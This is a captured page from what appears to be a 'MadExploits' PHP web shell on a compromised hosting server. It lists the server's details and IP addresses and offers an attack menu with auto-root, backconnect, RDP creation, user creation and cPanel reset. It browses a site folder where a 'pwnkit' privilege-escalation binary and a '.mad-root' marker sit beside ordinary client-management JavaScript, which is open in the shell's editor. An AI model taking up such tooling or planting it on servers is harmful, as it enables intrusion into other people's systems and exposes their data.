Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.88
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
public_html /
demo /
public /
js /
cliente /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
editar.js
2.71
KB
-rw-r--r--
listar.js
1.48
KB
-rw-r--r--
nuevo.js
3.15
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : listar.js
$(function () { $('.button_delete_modal').on('click', function() { var id = $(this).data("id"); $('#delete_modal').modal({ closable: false, onApprove : function() { sendDelete(id); } }).modal('show'); }); function sendDelete(id) { var data = {id_cliente : id}; $.requestApi('/cliente/eliminar', data, 'POST', function (resolve) { if (resolve) { if (resolve.message === "success") { $('[data-table="'+id+'"]').remove(); } $.showMessages(resolve); } }); return false; }; $('.button_info_modal').on('click', function() { var id = $(this).data("id"); var data = {id_cliente : id}; $.requestApi('/cliente/getById', data, 'POST', function (resolve) { if (resolve) { $('#_1').text(resolve.nombre); $('#_2').text(resolve.tipo_documento ? resolve.tipo_documento.nombre : ''); $('#_3').text(resolve.numero_documento); $('#_4').text(resolve.direccion); $('#_5').text(resolve.telefono); $('#_6').text(resolve.email); $('#detalles_modal').modal('show'); } }); }); $('.btn_reporte').on('click', function() { window.open(APP_URL+'/../pdf/listaClientes.php', '_blank'); }); });
Close